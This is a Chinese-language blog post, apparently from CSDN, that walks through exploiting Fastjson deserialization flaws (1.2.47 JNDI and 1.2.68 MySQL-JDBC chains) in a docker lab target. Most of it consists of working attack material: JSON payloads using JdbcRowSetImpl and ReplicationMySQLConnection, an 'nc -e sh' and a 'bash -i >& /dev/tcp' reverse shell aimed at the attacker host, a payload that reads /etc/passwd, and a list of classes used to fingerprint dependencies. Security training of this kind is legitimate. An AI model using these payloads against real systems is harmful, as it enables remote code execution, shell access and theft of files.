fastjson反序列化漏洞利用

已于 2024-09-07 20:16:15 修改
阅读量788 收藏 18
点赞数 25
文章标签: 安全
于 2024-07-13 11:36:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44414845/article/details/140394938
版权

fastjson反序列化漏洞利用


漏洞利用环境和payload参考君来自: FastJsonParty.

环境搭建注意点:配置一个好的镜像源。

vim /etc/docker/daemon.json

{
    "registry-mirrors": [
        "https://dockerhub.icu"
    ]
}

fastjson docker环境启动和关闭

docker-compose up -d
docker-compose down

fastjson 1247-jndi

演示环境IP介绍
攻击机:192.168.147.145
靶机(漏洞环境):192.168.147.128(docker搭建)

进入首页,点击登录。
在这里插入图片描述
在登录处抓包,发现为json格式传入参数:
在这里插入图片描述

删个末尾的}(也可以加个"),看报错,很标准的fastjson错误提示,确定后端使用的fastjson

在这里插入图片描述
探测fastjson精确版本:

{
  "@type": "java.lang.AutoCloseable"

利用jndi注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all

使用nc反弹shell,bash反弹是不能成功的,因为没有。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.147.145 -C "nc 192.168.147.145 9999 -e sh"

在这里插入图片描述
同时在攻击机上开启监听

nc -lvp 9999

在这里插入图片描述
burpsuit发包

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.147.145:1389/bsro5z",
        "autoCommit":true
    }
}

这里注意ldap链接是jndi注入工具自动生成的,每次启动jndi注入攻击链接后缀都不一样。
在这里插入图片描述
发送包后,反弹shell成功
在这里插入图片描述

fastjson 1268-jdbc

演示环境IP介绍
攻击机:192.168.147.145
靶机(漏洞环境):192.168.147.128(docker搭建)

首先判断fastjson版本,1.2.68

{
  "@type": "java.lang.AutoCloseable"

在这里插入图片描述
看到在这个大版本下,首先的思路肯定是考虑文件写操作,就需要判断是否为JDK11或者存在commons-io等其他文件写入的依赖,但是该环境下都是不存在的。
在这里插入图片描述

依赖检测方法:利用Character转换报错。

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.springframework.web.bind.annotation.RequestMapping"
    }
}

依赖存在的回包:

{
    "timestamp":"2024-01-31T09:57:13.698+0000","status":500,"error":"Internal Server Error","message":"can not cast to char, value : interface org.springframework.web.bind.annotation.RequestMapping","path":"/login"
}

依赖不存在的回包:

{
    "timestamp":"2024-01-31T09:56:13.060+0000","status":500,"error":"Internal Server Error","message":"No message available","path":"/login"
}

依赖检测项目

org.springframework.web.bind.annotation.RequestMapping  //SpringBoot
org.apache.catalina.startup.Tomcat  //Tomcat
groovy.lang.GroovyShell  //Groovy - 1.2.80
com.mchange.v2.c3p0.DataSources  //C3P0
com.mysql.jdbc.Buffer  //mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider  //mysql-connect-6
com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8
sun.nio.cs.GBK  //JDK8
java.net.http.HttpClient  //JDK11
org.apache.ibatis.type.Alias  //Mybatis
org.apache.tomcat.dbcp.dbcp.BasicDataSource  //tomcat-dbcp-7-BCEL
org.apache.tomcat.dbcp.dbcp2.BasicDataSource //tomcat-dbcp-8及以后-BCEL
org.apache.commons.io.Charsets       // 存在commons-io,但不确定版本
org.apache.commons.io.file.Counters  //commons-io-2.7-2.8
org.aspectj.ajde.Ajde  //aspectjtools

除了文件写操作,还有一个利用更加简单且直接rce的方法:配合Mysql-JDBC反序列化打fastjson。

要求环境中存在JDBC的依赖,且对版本的要求也挺严格。 Mysql-JDBC在5、6、8下都存在相应的利用,所以就需要探测具体是什么版本。

com.mysql.jdbc.Buffer  //mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider  //mysql-connect-6
com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8

显然这里使用的是mysql-connect-8.x

在这里插入图片描述
可是对于mysql-connect的版本为8下限制条件很大,只有一个版本可用:8.0.19

恰好环境是使用的8.0.19。
那就好说了,先启动mysql-fake-server,用这个工具:https://github.com/fnmsd/MySQL_Fake_Server
python3 server.py启动mysql-fake-server。
注意MySQL_Fake_Server依赖Python环境(建议3.6-3.8之间)和java环境(建议jdk 1.8),本攻击机上使用环境为Pyhton3.6.9,JDK环境为1.8。
在这里插入图片描述

在这里插入图片描述

正常启动MySQL_Fake_Server如下所示:
在这里插入图片描述
先读文件测试漏洞是否可行:
在这里插入图片描述

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "127.0.0.1"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.147.145",
                "user": "fileread_/etc/passwd",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

成功!看来是可用的
在这里插入图片描述
后面就是反序列化了。

反序列化的话因为在之前说过,fastjson在全版本都存在原生反序列化,且环境依赖中并不存在其他的组件,看来只能配合原生反序列化了。

这里的话因为mysql-fake-server调用反序列化模块的原理是需要我们传入ysoserial工具然后执行命令获取数据并发送,但是在本身的ysoserial工具中并没有加入fastjson这条链的payload,所以需要在ysoserial中加入fastjson这条链。
(使用FastJsonParty write-up中ysoserial工具即可,上传到与server.py同目录即可读取。)

burpsuit发送数据:(masters中的host不重要,可以任意填,这里写了127.0.0.1,properties中的IP要填成VPS攻击机的IP)
同时攻击机上开启监听:

nc -lvp 9999

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "127.0.0.1"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "192.168.147.145",
                "user": "yso_FastJson1_bash -i >& /dev/tcp/192.168.147.145/9999 0>&1",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

在这里插入图片描述
反弹shell成功
在这里插入图片描述

行者_Seven
关注
  • 25
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson反序列化漏洞利用分析合集
不忘初心,护天下安全!
07-18 246
流程的话就是通过靶场主机,发送payload,访问远程主机的9999端口也就是上边的ip2,之后因为9999端口开启的rmi服务,所以会直接访问7777端口的shell.class,之后执行class文件,进行反弹shell到公网ip(上边的ip1)在前边的POJO中特意提到过,这个toJSONString会默认执行调用类中的getter(),所以当我们payload传入BasicDataSource类后,就会调用他对应的getter()——getConnection()...
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5503
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
Fastjson漏洞利用合集
2301_76786857的博客
03-07 1492
FastJson 是Alibaba 的一款开源Json解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
Java安全篇-Fastjson漏洞
最新发布
m0_63138919的博客
03-28 3248
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
Fastjson 反序列化漏洞利用总结
roukmanx的博客
12-19 1597
本篇文章对Fastjson漏洞利用的过程做个简单的记录。 背景: Fastjson是Alibaba开发的,java语言编写的高性能JSON库,采用“假定有序快速匹配”的算法,号称Java语言中最快的JSON库。 其项目地址为https://github.com/alibaba/fastjson,其提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。示例代码:...
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6369
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Fastjson反序列化漏洞
m0_67401761的博客
09-11 1万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6986
fastjson反序列化漏洞原理及利用
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1856
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
Fastjson漏洞
qq_50854662的博客
10-09 5711
Fastjson漏洞
【网络安全】渗透测试——FastJson漏洞原理与复现
Cairo_A的博客
11-28 344
Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库, 用于将数据在 JSON 和 Java Object 之间互相转换, 提供两个主要接口 JSON.toJSONString 和 JSON.parseObject / JSON. parse 来分别实现序列化和反序列化操作.
Fastjson 漏洞利用技巧
05-08 2811
每次看到json数据包,都难免会想起Fastjson以及它多个版本存在的漏洞。如何实现自动化检测以及简化攻击步骤,从而提升漏洞发现能力,让你更有效率的Tips,在这里和大家分享下。01、自动化漏洞检测一款基于BurpSuite的被动式FastJson检测插件,这个插件会对BurpSuite传进来的带有json数据的请求包进行检测。Github项目地址:https://gi...
深究fastjson利用分析
m0_71746299的博客
01-18 659
在这个版本中主要是通过利用中的参数在中,如果想要加载的类不在白名单中,如果开启了或者为True都是可以的,这里我们需要在不开启的情况下,加载类,所以我们需要使得后者为true如上图所示,想要满足条件,就需要绕过这些内置的黑名单了以某个类作为参数传入查找反序列化的子类或实现,如果构造方法或setter中含有其它类型可重复第一步构造一个反序列化链,直到找到可以利用的类为止最后我想说,人生艰难,职业发展也不容易。这些除了依靠个人努力,更需要天时地利人和等外在条件。
Fastjson【RCE1.2.47】漏洞复现
02-24 1363
Fastjson漏洞原理和RCE1.2.47漏洞复现
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 701
Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全反序列化操作,导致攻击者能够执行任意代码或进行其他恶意操作。 这种漏洞通常是由于 fastjson反序列化过程中缺乏足够的安全检查和过滤机制,导致恶意用户能够构造特定的 JSON 字符串来触发漏洞。攻击者可以通过在 JSON 字符串中插入恶意的 Java 代码或利用已知的 Java 反序列化漏洞来执行任意代码。 为了防止 fastjson 反序列化漏洞的利用,建议遵循以下几点: 1. 尽量避免使用 fastjson 库,可以考虑使用其他更安全的 JSON 库。 2. 更新 fastjson 到最新版本,以获取最新的修复和安全增强功能。 3. 对用户输入的 JSON 字符串进行严格的验证和过滤,确保只有合法的、受信任的数据被反序列化。 4. 配置 fastjson 的 ParserConfig,限制反序列化操作只能处理预期的类型。 5. 避免在反序列化过程中执行不可信的代码,尽量将反序列化操作限制在有限的安全环境中。 总之,fastjson 反序列化漏洞是一个需要注意和防范的安全问题,开发者在使用 fastjson 库时应当保持警惕并采取相应的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值